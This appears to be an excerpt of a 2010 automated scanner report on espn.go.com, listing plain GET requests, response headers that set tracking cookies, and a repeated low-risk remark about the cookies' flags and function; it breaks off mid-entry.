HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:10:17 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Set-Cookie: SWID=728CC4E3-9BE6-4205-A3DF-E9DA0266E6C4; path=/; expires=Sat, 13-Nov-2030 18:10:17 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:11:23 GMT Content-Length: 204429 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:10:17 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:11:51 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /espn/wire HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:11:51 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=A19DEC16-4216-4DBE-A447-B0B9BD2BC0A7; path=/; expires=Sat, 13-Nov-2030 18:11:51 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:34:32 GMT Content-Length: 47922 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:11:51 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn3/blackout HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:42:46 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:42:45 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Set-Cookie: SWID=3E9E537B-9B7A-49DF-A4A1-D86A917AAE72; path=/; expires=Sat, 13-Nov-2030 17:42:45 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:51:05 GMT Content-Length: 3253 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn3/index/_/sport/basketball HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:40:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:32:31 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Set-Cookie: SWID=0EA55118-2954-4A4C-9FA9-217C970B6D8A; path=/; expires=Sat, 13-Nov-2030 17:40:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:40:50 GMT Content-Length: 186323 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn3/index/_/sport/football HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:41:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:34:54 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=0E685EB3-A53C-4C06-B9CE-883700FE2534; path=/; expires=Sat, 13-Nov-2030 17:41:28 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:43:14 GMT Content-Length: 326636 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn3/player HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:40:20 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:32:51 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Set-Cookie: SWID=5BDA550C-D9A4-4344-8666-B968112F604E; path=/; expires=Sat, 13-Nov-2030 17:40:20 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:41:12 GMT Content-Length: 21094 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Streaming Online - ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn3/search/indexFeaturedEvents HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:43:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:39:07 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Set-Cookie: SWID=06B9ECB3-DAFE-4C19-9ABC-3DE2A1776375; path=/; expires=Sat, 13-Nov-2030 17:43:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:47:27 GMT Content-Length: 2527 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
{"featuredEvents":[ {"id":"65908", "name":"Indiana vs. #7 Wisconsin", "eventType":"live", "starttime":"Sat, Nov 13, 12:00 PM", "thumbnail":"http://a.espncdn.com/espn360/images/fb/ncaaf/65908_small.jp ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:09:54 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /golf/leaderboard HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:09:54 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Set-Cookie: SWID=82326F9A-B7D8-4515-B91E-C9E9CD83EE83; path=/; expires=Sat, 13-Nov-2030 18:09:54 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:05:03 GMT Content-Length: 148067 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:09:54 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:17:27 GMT; Path=/; Domain=.go.com
DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 18:17:28 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /horse-racing/breederscup2010/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:17:27 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN19 Set-Cookie: SWID=4F518DDD-89D5-4083-B683-C54C5CEF326B; path=/; expires=Sat, 13-Nov-2030 18:17:27 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:50:50 GMT Content-Length: 69266 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:17:27 GMT; Path=/; Domain=.go.com Set-Cookie: DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 18:17:28 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mlb/clubhouse HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:00:43 GMT Location: http://espn.go.com/mlb/teams Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Set-Cookie: SWID=09753397-7395-4AF0-BFBF-AC34402C8D19; path=/; expires=Sat, 13-Nov-2030 18:00:43 GMT; domain=.go.com; Content-Length: 173 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://espn.go.com/mlb/teams ">http://espn.go.com/mlb/teams </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mlb/format/design09/index/playerRatingsTopTen HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 17:59:17 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 17:59:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=B9CEA655-9A94-4F2F-A70E-460FFB357DF2; path=/; expires=Sat, 13-Nov-2030 17:59:17 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:00:17 GMT Content-Length: 1762 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mlb/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 17:58:54 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 17:58:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=53C7807D-FFC5-42D2-8CF5-D01AEAA1D0B2; path=/; expires=Sat, 13-Nov-2030 17:58:54 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:59:54 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mlb/players/profile HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:59:50 GMT Location: http://espn.go.com/mlb/ Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Set-Cookie: SWID=51009071-0137-4BEA-8086-A7C8364936C9; path=/; expires=Sat, 13-Nov-2030 17:59:50 GMT; domain=.go.com; Content-Length: 163 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://espn.go.com/mlb/ ">http://espn.go.com/mlb/ </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/clubhouse HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:44:37 GMT Location: /nba/teams Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=E40B6BD4-9A48-47AF-91F7-E8198A246C97; path=/; expires=Sat, 13-Nov-2030 17:44:37 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/teams ">/nba/teams </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/conversation HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:46:09 GMT Location: /nba/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN09 Set-Cookie: SWID=1C7FCA27-5BE9-49CB-ADD9-9FB9ECF456B0; path=/; expires=Sat, 13-Nov-2030 17:46:09 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/index ">/nba/index </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:55:33 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /nba/gamecast HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:55:33 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Set-Cookie: SWID=CE391CE2-1247-4E75-9651-8E3774C2B870; path=/; expires=Sat, 13-Nov-2030 17:55:32 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:56:32 GMT Content-Length: 10388 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:55:33 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/players/profile HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:55:00 GMT Location: /nba/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Set-Cookie: SWID=03916822-F283-4D96-97C4-D8552E8F65FF; path=/; expires=Sat, 13-Nov-2030 17:55:00 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/index ">/nba/index </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/preview HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:46:10 GMT Location: /nba/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Set-Cookie: SWID=9E3B173E-3D3E-4373-B442-5153ABAA6A36; path=/; expires=Sat, 13-Nov-2030 17:46:10 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/index ">/nba/index </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/recap HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:46:15 GMT Location: /nba/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Set-Cookie: SWID=244A3381-CCFB-40FD-96CE-C5D1FE4DA983; path=/; expires=Sat, 13-Nov-2030 17:46:15 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/index ">/nba/index </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:15 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /nba/schedule HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:44:15 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=AEF4146B-D529-448B-8614-6DB92B9DB4DC; path=/; expires=Sat, 13-Nov-2030 17:44:15 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:44:43 GMT Content-Length: 71849 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:15 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nba/shotchart HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 17:50:21 GMT Location: /nba/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Set-Cookie: SWID=6C386EB4-B99E-4F1F-B299-51A3CC80DAE8; path=/; expires=Sat, 13-Nov-2030 17:50:21 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/nba/index ">/nba/index </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:32 GMT; Path=/; Domain=.go.com
DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 17:44:32 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /nba/truehoop/miamiheat/ HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:44:32 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Set-Cookie: SWID=A36C7A92-BD02-4CA4-9B32-CCDC3852BDE9; path=/; expires=Sat, 13-Nov-2030 17:44:32 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:40:51 GMT Content-Length: 192983 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:32 GMT; Path=/; Domain=.go.com Set-Cookie: DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 17:44:32 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
